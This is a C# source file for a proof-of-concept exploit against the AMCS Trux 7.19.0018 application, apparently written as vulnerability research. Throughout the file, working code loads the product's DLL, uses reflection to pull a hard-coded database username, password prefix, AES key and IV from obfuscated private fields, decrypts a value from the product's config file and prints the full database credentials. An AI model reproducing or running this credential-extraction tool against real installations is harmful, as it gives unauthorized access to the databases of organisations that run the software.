using System;
using System.IO;
using System.Reflection;
using System.Security.Cryptography;
using System.Text;
namespace DLLReflectionLoader
{
class Program
{
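/// <summary>
/// Entry point. Loads the target TxUtilities.dll, reads the hard-coded database user,
/// password prefix, AES key and IV out of the non-public instance fields of
/// TxUtilities.Database via reflection, decrypts the EP_TC10 value from TruxUser.cfg
/// with that key/IV, and prints the reassembled database credentials.
/// </summary>
/// <param name="args">
/// Optional overrides: args[0] = path to TxUtilities.dll, args[1] = path to TruxUser.cfg.
/// Both default to the original relative names (resolved against the current working
/// directory), so running with no arguments behaves exactly as before.
/// </param>
static void Main(string[] args)
{
    string assemblyPath = args.Length > 0 ? args[0] : "TxUtilities.dll";
    string configPath = args.Length > 1 ? args[1] : "TruxUser.cfg";

    Console.WriteLine("=========================================================");
    Console.WriteLine(" AMCS TRUX 7.19.0018 (219580057) Exploit Proof of Concept");
    Console.WriteLine("=========================================================");
    Console.WriteLine(" This Proof of Concept (POC) exploits an undisclosed");
    Console.WriteLine(" vulnerability in the AMCS Trux application. It is");
    Console.WriteLine(" designed to derive encrypted database credentials");
    Console.WriteLine(" and hard-coded decryption keys.");
    Console.WriteLine(" Author: Bryan Smith, Redline Cyber Security");
    Console.WriteLine(" CONFIDENTIAL USE ONLY");
    Console.WriteLine("==============================================\n");

    // WARNING: LoadFrom plus Activator.CreateInstance below executes code from the target
    // assembly (its type initializer and instance constructor) inside this process.
    // Only point this at a known-good copy of the DLL, and run it on an isolated host.
    Console.WriteLine("Loading " + assemblyPath + "...");
    Assembly assembly = Assembly.LoadFrom(assemblyPath);

    Console.WriteLine("Accessing TxUtilities.Database class...");
    Type type = assembly.GetType("TxUtilities.Database"); // Adjust the namespace and class name as necessary
    if (type == null)
    {
        Console.WriteLine("ERROR: Class not found.");
        return;
    }

    // The fields are instance fields, so an instance is required for their values to exist.
    Console.WriteLine("Creating an instance of the class...");
    object classInstance = Activator.CreateInstance(type);

    // Field names are single control characters (presumably obfuscator-generated) and are
    // tied to build 7.19.0018; any other build will need the mapping redone.
    Console.WriteLine("Retrieving DB User...");
    string dbUser = GetPrivateFieldValue<string>(type, classInstance, "\u0003");
    Console.WriteLine("DB User retrieved: " + dbUser);

    Console.WriteLine("Retrieving DB Password (Prefix)...");
    string passwordPrefix = GetPrivateFieldValue<string>(type, classInstance, "\u0005");
    Console.WriteLine("DB Password (Prefix): " + passwordPrefix);

    Console.WriteLine("Extracting Base64 value from " + configPath + "...");
    string base64Value = ExtractBase64Value(configPath);
    if (string.IsNullOrEmpty(base64Value))
    {
        // Previously fell through to Convert.FromBase64String(null) and crashed.
        Console.WriteLine("ERROR: No 'EP_TC10 :' entry found in " + configPath + ".");
        return;
    }
    Console.WriteLine("Config Ciphertext (Base64): " + base64Value);

    Console.WriteLine("Retrieving AES IV...");
    byte[] aesIv = GetPrivateFieldValue<byte[]>(type, classInstance, "\u001A");
    Console.WriteLine("AES IV: " + BitConverter.ToString(aesIv));

    Console.WriteLine("Retrieving AES KEY...");
    byte[] aesKey = GetPrivateFieldValue<byte[]>(type, classInstance, "\u001B");
    Console.WriteLine("AES KEY: " + BitConverter.ToString(aesKey));

    Console.WriteLine("Decrypting ciphertext...\n\n");
    byte[] cipherTextBytes;
    try
    {
        cipherTextBytes = Convert.FromBase64String(base64Value);
    }
    catch (FormatException)
    {
        Console.WriteLine("ERROR: The EP_TC10 value is not valid Base64.");
        return;
    }

    string decryptedText;
    try
    {
        decryptedText = DecryptStringFromBytes_Aes(cipherTextBytes, aesKey, aesIv);
    }
    catch (CryptographicException ex)
    {
        // A padding or key-size failure here almost always means the key/IV field mapping
        // is wrong for this build, not that the config value is corrupt.
        Console.WriteLine("ERROR: Decryption failed (" + ex.Message + "). Check the key/IV field names for this build.");
        return;
    }

    // NOTE(review): stripping embedded nulls suggests the plaintext may really be UTF-16
    // being decoded as UTF-8 by StreamReader's default; if so, reading it with
    // Encoding.Unicode would be the cleaner fix. Kept as-is pending confirmation against
    // the product's own encryption routine.
    string cleanedText = decryptedText.Replace("\0", string.Empty);

    Console.WriteLine("Database User : [" + dbUser + "]");
    Console.WriteLine("Database Password: [" + passwordPrefix + cleanedText + "]");

    Console.WriteLine("\n\nEXPLOIT COMPLETE");
    Console.WriteLine("Press any key to exit...");
    Console.ReadKey();

    // Reads a non-public instance field by name and casts its value to T.
    // Throws InvalidOperationException naming the field (as \uXXXX escapes) when it does
    // not exist on this build, instead of the NullReferenceException the original produced.
    T GetPrivateFieldValue<T>(Type targetType, object instance, string fieldName)
    {
        FieldInfo fieldInfo = targetType.GetField(fieldName, BindingFlags.NonPublic | BindingFlags.Instance);
        if (fieldInfo == null)
        {
            StringBuilder escaped = new StringBuilder();
            foreach (char c in fieldName)
            {
                escaped.Append("\\u").Append(((int)c).ToString("X4"));
            }
            throw new InvalidOperationException(
                "Field '" + escaped + "' not found on " + targetType.FullName
                + "; the field mapping is specific to build 7.19.0018.");
        }
        return (T)fieldInfo.GetValue(instance);
    }
}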
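/// <summary>
/// Scans <paramref name="fileName"/> line by line for the first line that begins with
/// "EP_TC10 :" and returns the trimmed text after the first ':' (the Base64 ciphertext).
/// </summary>
/// <param name="fileName">Path of the TruxUser.cfg-style text file to read.</param>
/// <returns>
/// The value, or null when no such line exists or the file cannot be read (the read
/// error is printed to the console; this is deliberately best-effort, the caller
/// checks for null).
/// </returns>
static string ExtractBase64Value(string fileName)
{
    const string Marker = "EP_TC10 :";
    try
    {
        foreach (string line in File.ReadLines(fileName))
        {
            // Ordinal: the marker is a fixed ASCII token, not linguistic text.
            if (line.StartsWith(Marker, StringComparison.Ordinal))
            {
                // Split at the first ':' only. Base64 never contains ':', so for a
                // well-formed value this is identical to the original Split(':')[1],
                // but it no longer truncates if anything after the value contains a colon.
                return line.Split(new[] { ':' }, 2)[1].Trim();
            }
        }
    }
    catch (Exception ex)
    {
        // Broad on purpose: any read failure (missing file, access denied, bad path)
        // maps to "no value", matching the original best-effort contract.
        Console.WriteLine("Error reading file: " + ex.Message);
    }
    return null;
}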
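/// <summary>
/// Decrypts <paramref name="cipherText"/> with AES in CBC mode with PKCS7 padding using the
/// supplied raw key and IV, and decodes the plaintext as text.
/// </summary>
/// <param name="cipherText">Raw ciphertext bytes.</param>
/// <param name="Key">Raw AES key (16, 24 or 32 bytes).</param>
/// <param name="IV">16-byte initialisation vector.</param>
/// <returns>
/// The decrypted text, decoded by StreamReader's default (UTF-8 with BOM detection).
/// </returns>
/// <exception cref="ArgumentNullException">Any argument is null.</exception>
/// <exception cref="CryptographicException">
/// Wrong key or IV length, or the padding check fails (usually a wrong key/IV).
/// </exception>
static string DecryptStringFromBytes_Aes(byte[] cipherText, byte[] Key, byte[] IV)
{
    // Same exception types the original raised from deeper inside, just raised up front.
    if (cipherText == null) throw new ArgumentNullException(nameof(cipherText));
    if (Key == null) throw new ArgumentNullException(nameof(Key));
    if (IV == null) throw new ArgumentNullException(nameof(IV));

    using (Aes aesAlg = Aes.Create())
    {
        // CBC/PKCS7 are what Aes.Create() defaults to, but pin them explicitly so the
        // result cannot silently change with a different provider or runtime default.
        aesAlg.Mode = CipherMode.CBC;
        aesAlg.Padding = PaddingMode.PKCS7;
        aesAlg.Key = Key;
        aesAlg.IV = IV;

        // The transform is IDisposable; the original never disposed it.
        using (ICryptoTransform decryptor = aesAlg.CreateDecryptor(aesAlg.Key, aesAlg.IV))
        using (MemoryStream msDecrypt = new MemoryStream(cipherText))
        using (CryptoStream csDecrypt = new CryptoStream(msDecrypt, decryptor, CryptoStreamMode.Read))
        using (StreamReader srDecrypt = new StreamReader(csDecrypt))
        {
            return srDecrypt.ReadToEnd();
        }
    }
}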
}
}